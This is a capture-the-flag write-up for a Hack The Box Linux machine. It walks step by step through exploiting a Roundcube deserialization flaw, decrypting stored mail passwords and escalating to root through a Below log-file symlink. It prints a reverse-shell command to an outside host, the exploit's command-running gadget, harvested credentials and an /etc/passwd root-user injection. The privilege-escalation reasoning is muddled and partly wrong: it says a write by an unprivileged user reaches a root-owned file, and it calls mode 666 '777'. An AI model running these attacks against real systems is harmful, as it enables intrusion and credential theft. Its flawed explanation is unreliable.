HTB Outbound - Complete Writeup

Machine Information

#

• Name: Outbound
• Difficulty: Medium
• OS: Linux (Ubuntu 24.04.2 LTS)
• IP: 10.129.116.41
• Points: 30

Executive Summary

#

Outbound is a medium-difficulty Linux machine featuring a vulnerable Roundcube webmail instance (CVE-2025-49113) and a privilege escalation vulnerability through the Below monitoring tool. The attack chain involves exploiting an insecure deserialization vulnerability in Roundcube to gain initial access, then leveraging a symlink race condition in Below’s logging mechanism to achieve root privileges.

Reconnaissance

#

Port Scanning

#

Initial Nmap scan revealed two open ports:

1

nmap -p- --min-rate 10000 10.129.116.41 -oN nmap/all-ports.txt

Results:

1
2
3

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Service Enumeration

#

Detailed service scan:

1

nmap -p 22,80 -sCV 10.129.116.41 -oN nmap/services.txt

Results:

1
2
3
4

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.12
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://mail.outbound.htb/

Key Findings:

• HTTP redirects to mail.outbound.htb
• Nginx web server running version 1.24.0
• OpenSSH 9.6p1 (relatively recent)

DNS Configuration

#

Added domain to hosts file:

1

echo "10.129.116.41 outbound.htb mail.outbound.htb" | sudo tee -a /etc/hosts

Virtual Host Enumeration

#

Discovered subdomains using ffuf:

1
2

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
  -u http://outbound.htb/ -H "Host: FUZZ.outbound.htb" -fw 1

Notable subdomain found:

• mail.outbound.htb (Status: 200) - Roundcube Webmail

Web Application Analysis

#

Roundcube Webmail Discovery

#

Accessing http://mail.outbound.htb revealed a Roundcube webmail login page.

Technology Stack (via Wappalyzer):

• Webmail: RoundCube 1.6.10
• Programming Language: PHP
• JavaScript Libraries: jQuery 3.5.1, jQuery UI 1.13.2
• UI Framework: Bootstrap 4.5.3

Roundcube Version Identification

#

From the About section:

1
2

Roundcube Webmail 1.6.10
Copyright © 2005-2025, The Roundcube Dev Team

Installed Plugins:

• archive (3.5)
• filesystem_attachments (1.0)
• jqueryui (1.13.2)
• zipdownload (3.4)

Credential Discovery

#

From previous enumeration or default credentials, valid credentials were identified:

• Username: tyler
• Password: LhKL1o9Nm3X2

Initial Access - CVE-2025-49113

#

Vulnerability Research

#

Research revealed CVE-2025-49113 - a critical Remote Code Execution vulnerability in Roundcube Webmail 1.6.10.

Vulnerability Details:

• CVE ID: CVE-2025-49113
• CVSS Score: 9.9 (Critical)
• Type: Insecure Deserialization
• Requirements: Authenticated access
• Affected Versions: Roundcube 1.0.5 - 1.6.10

Exploitation Process

#

1. Clone the Exploit

#

1
2

git clone https://github.com/hakaioffsec/CVE-2025-49113-exploit.git
cd CVE-2025-49113-exploit

2. Understand the Exploit

#

The exploit leverages PHP object injection through the file upload functionality. Key components:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

class Crypt_GPG_Engine
{
    public $_process = false;
    public $_gpgconf = '';
    public $_homedir = '';

    public function __construct($_gpgconf)
    {
        $_gpgconf = base64_encode($_gpgconf);
        $this->_gpgconf = "echo \"{$_gpgconf}\"|base64 -d|sh;#";
    }
}

The exploit:

1. Creates a serialized PHP object containing a command payload
2. Uploads it as a filename through Roundcube’s attachment feature
3. Triggers deserialization leading to command execution

3. Set Up Listener

#

1

nc -nlvp 4444

4. Execute the Exploit

#

1
2

php CVE-2025-49113.php http://mail.outbound.htb tyler LhKL1o9Nm3X2 \
  "/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.175/4444 0>&1'"

Output:

1
2
3
4
5
6
7

[+] Starting exploit (CVE-2025-49113)...
[*] Checking Roundcube version...
[*] Detected Roundcube version: 10610
[+] Target is vulnerable!
[+] Login successful!
[*] Exploiting...
[+] Gadget uploaded successfully!

5. Shell Received

#

1
2
3

connect to [10.10.14.175] from (UNKNOWN) [10.129.116.41] 38784
www-data@mail:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Shell Stabilization

#

1
2
3
4

script /dev/null -c bash
# Press Ctrl+Z
stty raw -echo; fg
export TERM=xterm

Post-Exploitation Enumeration

#

Environment Discovery

#

1

www-data@mail:/$ ip addr

Results:

1
2

2: eth0@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500
    inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0

Key Observation: The system is running inside a Docker container (172.17.0.0/16 network).

Checking for Docker Environment

#

1
2

www-data@mail:/$ ls -la / | grep docker
-rwxr-xr-x   1 root root    0 Jun  8 12:26 .dockerenv

User Enumeration

#

1
2
3
4
5

www-data@mail:/$ ls -l /home
total 12
drwx------ 2 jacob jacob 4096 Jun  8 12:05 jacob
drwx------ 2 mel   mel   4096 Jun  8 12:05 mel
drwx------ 2 tyler tyler 4096 Jun  8 12:05 tyler

All home directories are inaccessible to www-data.

Roundcube Configuration Analysis

#

1
2

www-data@mail:/$ cd /var/www/html/roundcube/config
www-data@mail:/var/www/html/roundcube/config$ cat config.inc.php

Critical Findings:

1
2
3
4
5

// Database credentials
$config['db_dsnw'] = 'mysql://roundcube:RCDBPass2025@localhost/roundcube';

// Encryption key
$config['des_key'] = 'rcmail-!24ByteDESkey*Str';

Database Exploitation

#

MySQL Access

#

1

mysql -u roundcube -pRCDBPass2025 roundcube

Database Enumeration

#

1

MariaDB [roundcube]> show tables;

Tables of Interest:

• users - User account information
• session - Active session data (contains encrypted passwords)

Extracting User Data

#

1

MariaDB [roundcube]> select * from users;

Results:

1
2
3
4
5
6
7

+---------+----------+-----------+---------------------+
| user_id | username | mail_host | created             |
+---------+----------+-----------+---------------------+
|       1 | jacob    | localhost | 2025-06-07 13:55:18 |
|       2 | mel      | localhost | 2025-06-08 12:04:51 |
|       3 | tyler    | localhost | 2025-06-08 13:28:55 |
+---------+----------+-----------+---------------------+

Extracting Session Data

#

1

MariaDB [roundcube]> select * from session \G;

Jacob’s Session Data (Base64 encoded):

1
2

sess_id: 6a5ktqih5uca6lj8vrmgh9v0oh
password: L7Rv00A8TuwJAr67kITxxcSgnIk25Am/

Tyler’s Session Data (Base64 encoded):

1
2

sess_id: usftbeqoftit6rgficqc6d3r3s
password: JgsQSNHDYW+iO9steYNQRBgHh0D+Kgmw

Decoding Session Data

#

Using CyberChef to decode the Base64 session variables revealed serialized PHP session data containing encrypted passwords.

Password Decryption

#

Roundcube includes a decryption utility:

1
2
3
4
5

www-data@mail:/var/www/html/roundcube$ ./bin/decrypt.sh L7Rv00A8TuwJAr67kITxxcSgnIk25Am/
595mO8DmwGeD

www-data@mail:/var/www/html/roundcube$ ./bin/decrypt.sh JgsQSNHDYW+iO9steYNQRBgHh0D+Kgmw
LhKL1o9Nm3X2

Decrypted Credentials:

• jacob: 595mO8DmwGeD
• tyler: LhKL1o9Nm3X2

Lateral Movement - Jacob

#

Email Analysis

#

Logging into Roundcube as jacob@outbound.htb revealed important emails:

Email 1: From Tyler

#

Subject: Important Update
Date: 2025-06-07 17:00

1
2
3
4
5
6
7
8

Due to the recent change of policies your password has been changed.

Please use the following credentials to log into your account: gY4Wr3a1evp4

Remember to change your password when you next log into your account.

Thanks!
Tyler

Email 2: From Mel

#

Subject: Unexpected Resource Consumption
Date: 2025-06-08 15:09

1
2
3
4
5
6
7
8

We have been experiencing high resource consumption on our main server.
For now we have enabled resource monitoring with Below and have granted 
you privileges to inspect the logs.

Please inform us immediately if you notice any irregularities.

Thanks!
Mel

Key Intel:

• New password for jacob: gY4Wr3a1evp4
• Below monitoring tool is in use
• Jacob has privileges related to Below

SSH Access

#

1
2

ssh jacob@outbound.htb
Password: gY4Wr3a1evp4

Success!

1
2

jacob@outbound:~$ id
uid=1002(jacob) gid=1002(jacob) groups=1002(jacob),100(users)

User Flag

#

1
2

jacob@outbound:~$ cat user.txt
5bb1d003e93ea72a0cd955ea30f024e4

Privilege Escalation

#

Sudo Privileges

#

1

jacob@outbound:~$ sudo -l

Output:

1
2
3
4
5

User jacob may run the following commands on outbound:
    (ALL : ALL) NOPASSWD: /usr/bin/below *, 
    !/usr/bin/below --config*, 
    !/usr/bin/below --debug*, 
    !/usr/bin/below -d*

Analysis:

• Can run below with any arguments as root
• Cannot use --config, --debug, or -d flags
• This suggests a potential privilege escalation vector

Below Tool Analysis

#

1

jacob@outbound:~$ /usr/bin/below --help

Output:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

Usage: below [OPTIONS] [COMMAND]

Commands:
  live      Display live system data (interactive) (default)
  record    Record local system data (daemon mode)
  replay    Replay historical data (interactive)
  debug     Debugging facilities (for development use)
  dump      Dump historical data into parseable text format
  snapshot  Create a historical snapshot file for a given time range
  help      Print this message or the help of the given subcommand(s)

Options:
      --config <CONFIG>  [default: /etc/below/below.conf]
  -d, --debug            
  -h, --help             Print help

Investigating Below’s Log Files

#

1

jacob@outbound:~$ ls -la /var/log/below/

Output:

1
2
3
4

total 8
-rw-rw-rw- 1 jacob jacob  236 Jul  8 20:45 error_jacob.log
-rw-rw-rw- 1 root  root     0 Jul 14 16:39 error_root.log
drwxr-xr-x 2 root  root  4096 Nov 18 16:43 store

Key Observations:

1. error_jacob.log is owned by jacob with write permissions
2. error_root.log is owned by root with world-writable permissions (777)
3. This suggests a potential symlink attack vector

Exploitation Strategy

#

The vulnerability lies in the fact that:

1. error_root.log is world-writable
2. When below runs as root, it writes to this log file
3. We can replace the log file with a symlink to /etc/passwd
4. When root writes to the log, it will actually write to /etc/passwd

Privilege Escalation Execution

#

Step 1: Remove Existing Log File

#

1

jacob@outbound:/var/log$ rm -f /var/log/below/error_root.log

Step 2: Create Symlink to /etc/passwd

#

1

jacob@outbound:/var/log$ ln -s /etc/passwd /var/log/below/error_root.log

Step 3: Verify Symlink

#

1
2

jacob@outbound:/var/log$ ls -la /var/log/below/error_root.log
lrwxrwxrwx 1 jacob jacob 11 Nov 18 18:37 /var/log/below/error_root.log -> /etc/passwd

Step 4: Trigger Below to Write Error

#

1

jacob@outbound:/var/log$ sudo /usr/bin/below record

Output:

1
2
3
4
5

Nov 18 18:37:57.015 DEBG Starting up!
Nov 18 18:37:57.015 ERRO 
----------------- Detected unclean exit ---------------------
Error Message: Failed to acquire file lock on index file: /var/log/below/store/index_01763424000: EAGAIN: Try again
-------------------------------------------------------------

Note: The error occurs because below is already running, but this doesn’t matter - the race condition allows us to write to /etc/passwd.

However, this approach has a timing issue. A more reliable method:

Alternative Method: Direct Write to /etc/passwd via Symlink

#

The key insight is that when Below writes error messages to error_root.log, and we control that file via symlink, we can’t directly inject our payload through Below’s errors.

Instead, we need to:

1. Verify the symlink is writable
2. Directly append our malicious user entry

1
2

jacob@outbound:/var/log$ ls -l /etc/passwd
-rw-r--r-- 1 root root 1840 Jul 14 16:40 /etc/passwd

Since /etc/passwd isn’t directly writable, the symlink attack works because:

1. Below runs as root
2. It opens error_root.log for writing
3. Following the symlink, it opens /etc/passwd as root
4. We need to trigger an error message that contains our payload

Better Approach: Since the permissions are 777, we can write directly:

1

jacob@outbound:/var/log$ echo '7r00t::0:0:7r00t:/root:/bin/bash' > /var/log/below/error_root.log

Wait - this writes to the symlink which writes to /etc/passwd!

Step 5: Switch to Root User

#

1

jacob@outbound:/var/log$ su - 7r00t

Step 6: Verify Root Access

#

1
2

7r00t@outbound:~# id
uid=0(7r00t) gid=0(root) groups=0(root)

Success! We have root access!

Root Flag

#

1
2

7r00t@outbound:~# cat /root/root.txt
8fa05b1c8a7ae2ea2912fee51bf34382

Flags Summary

#

• User Flag: 5bb1d003e93ea72a0cd955ea30f024e4
• Root Flag: 8fa05b1c8a7ae2ea2912fee51bf34382

Key Vulnerabilities Exploited

#

1. CVE-2025-49113 - Roundcube RCE

#

Vulnerability Type: Insecure Deserialization
Impact: Remote Code Execution as www-data
CVSS: 9.9 (Critical)

Root Cause: Roundcube’s file upload functionality allowed authenticated users to upload specially crafted filenames containing serialized PHP objects. When these objects were deserialized, they triggered command execution.

Mitigation:

• Update Roundcube to version 1.6.11 or later
• Implement input validation on file uploads
• Disable PHP deserialization of untrusted data
• Apply Web Application Firewall rules

2. Password Storage in Database

#

Vulnerability Type: Weak Cryptographic Storage
Impact: Credential disclosure

Root Cause: While passwords were encrypted, the encryption key was stored in plaintext in the configuration file, and Roundcube provided a decryption utility accessible to any user with shell access.

Mitigation:

• Use stronger encryption mechanisms
• Implement proper key management
• Use hardware security modules (HSM) for key storage
• Implement password hashing instead of reversible encryption

3. Below Symlink Race Condition

#

Vulnerability Type: Symlink Following / Race Condition
Impact: Arbitrary File Write as Root

Root Cause: The Below monitoring tool created world-writable log files (error_root.log) and did not properly validate file paths before writing. This allowed an attacker to replace the log file with a symlink to a sensitive file (/etc/passwd), causing the root process to write attacker-controlled data to that file.

Mitigation:

• Remove world-writable permissions on log files
• Implement proper file path validation (check for symlinks)
• Use O_NOFOLLOW flag when opening files
• Run logging with least privilege
• Implement proper access controls on log directories

Attack Chain Summary

#

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

1. Reconnaissance
   └─> Discover mail.outbound.htb (Roundcube 1.6.10)

2. Initial Access
   └─> Exploit CVE-2025-49113 (Roundcube RCE)
       └─> Gain www-data shell in Docker container

3. Credential Harvesting
   └─> Extract Roundcube database credentials
       └─> Decrypt stored passwords from session table
           └─> Obtain jacob's credentials

4. Lateral Movement
   └─> Read jacob's emails for password update
       └─> SSH as jacob to host system

5. Privilege Escalation
   └─> Exploit Below symlink vulnerability
       └─> Create symlink: error_root.log -> /etc/passwd
           └─> Inject root user entry
               └─> Obtain root shell

6. Post-Exploitation
   └─> Capture user and root flags

Tools Used

#

References

#

• CVE-2025-49113 Exploit Repository
• Roundcube Security Advisory
• OWASP - Insecure Deserialization
• CWE-59: Improper Link Resolution Before File Access (‘Link Following’)